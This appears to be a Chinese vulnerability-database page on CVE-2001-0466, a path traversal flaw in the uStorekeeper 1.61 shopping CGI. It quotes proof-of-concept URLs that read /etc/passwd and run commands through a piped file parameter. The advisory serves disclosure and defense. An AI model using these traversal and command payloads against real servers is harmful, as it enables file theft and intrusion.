ustorekeeper目录遍历漏洞

ustorekeeper目录遍历漏洞

漏洞ID 1106275 漏洞类型 路径遍历
发布时间 2001-04-02 更新时间 2001-06-18
图片[1]-ustorekeeper目录遍历漏洞-安全小百科CVE编号 CVE-2001-0466
图片[2]-ustorekeeper目录遍历漏洞-安全小百科CNNVD-ID CNNVD-200106-107
漏洞平台 CGI CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20725
https://www.securityfocus.com/bid/88984
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-107
|漏洞详情
ustorekeeper1.61版本存在目录遍历漏洞。远程攻击者可以借助file参数的..(点点)读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/2536/info

A vulnerability exists in versions of uStorekeeper Online Shopping System from Microburst Technologies.

The script fails to properly validate user-supplied input, allowing remote users to submit URLs containing '/../' sequences and arbitrary filenames or commands, which will be executed or displayed with the privilege level of the webserver user.

This permits the remote user to request files and execute commands from arbitrary locations on the host filesystem, outside the script's normal directory scope.

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls |

http://www.example.com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd

http://www.example .com/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../.
./../../../../bin/cat%20ustorekeeper.pl|
|受影响的产品
Microburst uStorekeeper Online Shopping System 1.61
|参考资料

来源:BUGTRAQ
名称:20010403newadvisory
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=98633176230748&w;=2

相关推荐: HP OpenView ECSD Buffer Overflow Vulnerability

HP OpenView ECSD Buffer Overflow Vulnerability 漏洞ID 1103184 漏洞类型 Boundary Condition Error 发布时间 2001-05-23 更新时间 2001-05-23 CVE编号 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享